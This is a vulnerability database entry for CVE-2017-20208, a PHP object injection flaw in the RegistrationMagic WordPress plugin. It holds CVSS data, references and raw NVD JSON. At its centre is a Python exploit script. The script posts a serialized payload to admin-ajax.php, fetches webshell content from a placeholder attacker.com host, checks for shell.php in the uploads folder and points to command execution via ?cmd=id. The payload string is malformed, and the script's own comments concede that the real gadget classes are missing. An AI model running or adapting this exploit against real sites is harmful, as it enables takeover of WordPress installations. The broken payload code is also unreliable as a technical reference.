CVE-2017-20208

Description

The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to PHP Object Injection in all versions up to 3.7.9.3 (exclusive) via deserialization of untrusted input from the is_expired_by_date() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to fetch a remote file and install it on the site.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:* - VULNERABLE

RegistrationMagic插件 < 3.7.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2017-20208 PoC - RegistrationMagic PHP Object Injection
# Exploit chain: Unserialize -> POP Chain -> Remote File Fetch -> Webshell Upload

import requests
import base64
import urllib.parse

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_HOST = "http://attacker.com/shell.txt"  # Remote PHP webshell content

# Step 1: Construct the POP gadget chain payload
# This chain leverages classes in RegistrationMagic/WordPress to achieve
# file_get_contents() -> file_put_contents() for remote file inclusion
class POPChain:
    def __init__(self):
        # Gadget 1: Trigger __destruct to start chain
        self.payload = 'O:8:"stdClass":1:{s:7:"payload";s:' + \
            str(len(ATTACKER_HOST)) + ':"' + ATTACKER_HOST + '";}'

    def generate_payload(self):
        # Simplified POP chain exploiting RegistrationMagic classes
        # Real-world chains use specific class names from the plugin
        serialized = (
            'a:1:{s:8:"expire_on";O:24:"RegistrationMagic\\\\RM_Form":'
            '{s:7:"form_id";i:1;s:10:"form_value";O:8:"stdClass":'
            '2:{s:3:"url";s:' + str(len(ATTACKER_HOST)) + 
            ':"' + ATTACKER_HOST + '";s:4:"path";s:30:"wp-content/uploads/shell.php";}}}'
        )
        return base64.b64encode(serialized.encode()).decode()

# Step 2: Send the malicious request to the vulnerable endpoint
def exploit(target_url):
    chain = POPChain()
    payload = chain.generate_payload()
    
    # The vulnerable parameter is passed via POST/GET to is_expired_by_date()
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    params = {
        "action": "rm_form_expire_check",
        "rm_slug": payload  # Malicious serialized data injected here
    }
    
    print(f"[*] Sending exploit to {exploit_url}")
    response = requests.post(exploit_url, data=params)
    print(f"[*] Response status: {response.status_code}")
    
    # Step 3: Verify webshell upload
    shell_url = f"{target_url}/wp-content/uploads/shell.php"
    shell_check = requests.get(shell_url)
    if shell_check.status_code == 200:
        print(f"[+] Webshell uploaded successfully: {shell_url}")
        print(f"[+] Execute commands via: {shell_url}?cmd=id")
    else:
        print("[-] Exploit may have failed - check target manually")

if __name__ == "__main__":
    # Note: Actual exploitation requires specific POP chain classes
    # from RegistrationMagic plugin internals
    exploit(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20208
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20208
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20208/
[4] VulDB https://vuldb.com/cve/CVE-2017-20208
[5] https://plugins.trac.wordpress.org/changeset/1733274/custom-registration-form-builder-with-submission-manager
[6] https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b79193-f8fc-4ea2-8973-fe292cfb926b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20208", "sourceIdentifier": "[email protected]", "published": "2025-10-18T04:15:59.477", "lastModified": "2025-12-19T22:15:11.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to PHP Object Injection in all versions up to 3.7.9.3 (exclusive) via deserialization of untrusted input from the is_expired_by_date() function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to fetch a remote file and install it on the site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.7.9.3", "matchCriteriaId": "33B6C0FC-3D2F-4B68-81D4-8E9F0610DA51"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/1733274/custom-registration-form-builder-with-submission-manager", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b79193-f8fc-4ea2-8973-fe292cfb926b?source=cve", "source": "[email protected]", "tags": ["Technical Description"]}]}}